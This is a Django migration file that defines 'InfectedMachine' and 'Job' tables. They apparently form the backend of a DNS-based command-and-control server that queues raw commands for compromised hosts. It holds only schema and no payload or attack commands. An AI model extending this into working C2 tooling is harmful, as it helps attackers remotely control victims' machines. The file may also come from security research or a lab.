# Generated by Django 6.0.5 on 2026-05-25 08:04

import django.db.models.deletion
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='InfectedMachine',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('last_handshake_at', models.DateTimeField(null=True)),
                ('dns_identifier', models.CharField(db_index=True, max_length=100)),
                ('name', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Job',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('raw_command', models.TextField()),
                ('finished', models.BooleanField(default=False)),
                ('finished_at', models.DateTimeField(null=True)),
                ('infected_machine', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='djangoproject.infectedmachine')),
            ],
        ),
    ]
